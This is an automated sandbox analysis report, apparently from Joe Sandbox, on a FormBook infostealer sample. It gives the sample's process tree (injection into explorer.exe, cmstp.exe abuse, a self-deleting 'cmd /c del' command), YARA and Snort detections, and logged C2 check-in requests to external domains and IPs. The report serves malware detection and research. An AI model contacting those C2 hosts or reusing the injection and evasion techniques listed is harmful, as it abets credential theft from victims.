
Analysis Report 20210113432.exe

Overview

General Information

Sample Name: 20210113432.exe
Analysis ID: 339348
MD5: 13dbc9c1c5a2811ecbee5f420c9c75b6
SHA1: 6b01e540d3757944b61baa187159a908e170d5ae
SHA256: ba41656ca5e0e243cff9f6a536c43998a9dbc492f5e813a0022e84359b2e0ef8
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Windows Living Off The Land Binaries (LOLBins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 20210113432.exe (PID: 1476 cmdline: 'C:\Users\user\Desktop\20210113432.exe' MD5: 13DBC9C1C5A2811ECBEE5F420C9C75B6)
    • 20210113432.exe (PID: 5320 cmdline: C:\Users\user\Desktop\20210113432.exe MD5: 13DBC9C1C5A2811ECBEE5F420C9C75B6)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5300 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 6292 cmdline: /c del 'C:\Users\user\Desktop\20210113432.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source: 2.2.20210113432.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 2.2.20210113432.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.20210113432.exe.400000.0.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 2.2.20210113432.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 2.2.20210113432.exe.400000.0.raw.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

System Summary:

Sigma detected: CMSTP Execution Process Creation
Source: Process started, Author: Nik Seetharaman, Data: Command: /c del 'C:\Users\user\Desktop\20210113432.exe', CommandLine: /c del 'C:\Users\user\Desktop\20210113432.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 5300, ProcessCommandLine: /c del 'C:\Users\user\Desktop\20210113432.exe', ProcessId: 6292

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: 20210113432.exe, Virustotal: Detection: 28%
Source: 20210113432.exe, ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match, File source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 20210113432.exe, Joe Sandbox ML: detected
Source: 2.2.20210113432.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 20210113432.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 20210113432.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cmstp.pdbGCTL source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe, 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmp, cmstp.exe
Source: Binary string: cmstp.pdb source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 4x nop then pop edi 2_2_00416C8E
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 4x nop then pop edi 2_2_00417D5A
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 4x nop then pop edi 10_2_00856C8E
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 4x nop then pop edi 10_2_00857D5A

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 74.208.236.28:80
Source: global traffic, HTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ== HTTP/1.1, Host: www.miproper.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dkk/?EvI=VuWlRtEQc0PyYNliE71gHvEq4u/XFVndbD6PF4RlFVBK20m1fz7CdpGmHTE9G7iYyzSgqX7WhA==&J49Tz=eln47v8hVLB HTTP/1.1, Host: www.fordexplorerproblems.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1, Host: www.southsideflooringcreations.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB HTTP/1.1, Host: www.exoticorganicwine.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: Joe Sandbox View, IP Address: 34.102.136.180
Source: Joe Sandbox View, IP Address: 184.168.131.241
Source: Joe Sandbox View, ASN Name: GOOGLEUS
Source: Joe Sandbox View, ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: unknown, DNS traffic detected: queries for: www.semaindustrial.com
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 20210113432.exe, String found in binary or memory: http://tempuri.org/_391backDataSet.xsd
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000002.623532384.0000000006870000.00000004.00000001.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.278983339.000000000BE76000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_00419D50 NtCreateFile
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_00419E00 NtReadFile
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_00419E80 NtClose
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_00419F30 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949840 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049499A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049495D0 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949540 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049496D0 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049496E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949650 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949A50 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049498A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049498F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949820 NtEnumerateKey
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0494B040 NtSuspendThread
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049499D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049495F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0494AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949950 NtQueueApcThread
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949560 NtWriteFile
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949A10 NtQuerySection
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949A20 NtResumeThread
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0494A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049497A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0494A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949B00 NtSetValueKey
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949770 NtSetInformationFile
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0494A770 NtOpenThread
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04949760 NtOpenProcess
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_00859D50 NtCreateFile
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_00859E80 NtClose
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_00859E00 NtReadFile
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_00859F30 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 0_2_009251A1
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 0_2_0093283A
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_00401030
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_0041E1EB
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_0041D1F9
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_0041E265
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_0041D5CF
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_00402D87
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_00402D90
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_0041E64E
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_00409E30
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_0041DFF7
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_00402FB0
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_009451A1
Source: C:\Users\user\Desktop\20210113432.exe, Code function: 2_2_0095283A
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0491B090
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049320A0
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049D20A8
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0491841F
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049C1002
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04932581
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0491D5E0
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0490F900
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049D2D07
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04900D20
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04924120
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049D1D55
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049D22AE
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049D2EF7
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_04926E30
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0493EBB0
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049CDBD2
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049D1FF1
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_049D2B28
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0085E1EB
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0085E265
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_00842D87
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_00842D90
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_00849E30
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0085E64E
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_00842FB0
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 10_2_0085DFF7
Source: C:\Windows\SysWOW64\cmstp.exe, Code function: String function: 0490B150 appears 35 times
          Source: 20210113432.exe, 00000000.00000002.254808962.0000000002E31000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSoapName.dll2 vs 20210113432.exe
          Source: 20210113432.exe, 00000000.00000002.254070147.0000000000A28000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePackingSize.exe: vs 20210113432.exe
          Source: 20210113432.exe, 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePositiveSign.dll< vs 20210113432.exe
          Source: 20210113432.exe, 00000002.00000002.293261295.000000000167F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 20210113432.exe
          Source: 20210113432.exe, 00000002.00000000.253368089.0000000000A48000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePackingSize.exe: vs 20210113432.exe
          Source: 20210113432.exe, 00000002.00000002.292959417.000000000112A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs 20210113432.exe
          Source: 20210113432.exeBinary or memory string: OriginalFilenamePackingSize.exe: vs 20210113432.exe
          Source: 20210113432.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
